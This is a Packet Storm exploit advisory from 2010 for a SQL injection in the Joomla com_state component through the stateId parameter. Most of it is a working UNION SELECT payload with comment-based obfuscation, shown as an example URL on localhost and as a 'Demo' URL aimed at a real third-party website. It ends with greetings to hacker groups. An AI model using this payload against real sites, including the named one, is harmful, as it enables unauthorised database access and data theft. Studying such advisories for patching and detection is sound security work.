Joomla State SQL Injection

2010-05-21T00:00:00
ID PACKETSTORM:89758
Type packetstorm
Reporter Kernel Security Group
Modified 2010-05-21T00:00:00

Description

                                        
                                            `[+] Title : Joomla Component com_state SQL Injection Vulnerability  
[+] Author: Kernel Security Group  
[+] Data : 2010-05-19  
  
[!]#####################################################################################################[!]  
  
[+] Title : Joomla Component com_state SQL Injection Vulnerability  
[+] Author : Kernel Security Group By D3v1l.blackhat  
[+] Homepage : http://www.KernelSec.com  
[+] Email : Info@KernelSec.com  
  
[!]#####################################################################################################[!]  
  
[+] Vulnerable File :  
  
http://127.0.0.1/index.php?option=com_state&stateId=[SQL]  
]   
[+] ExploiT :  
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
[+] Example :  
  
http://127.0.0.1/index.php?option=com_state&stateId=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
[+] Demo :  
  
http://state.rti4success.org/index.php?option=com_state&stateId=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
[!]#####################################################################################################[!]  
  
[+] Special Thanks To My Best FriendS :  
  
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS  
  
[+] IRANIAN Young HackerZ  
  
[+] GreetZ : Exploit-DB TeaM  
  
[!]#####################################################################################################[!]  
`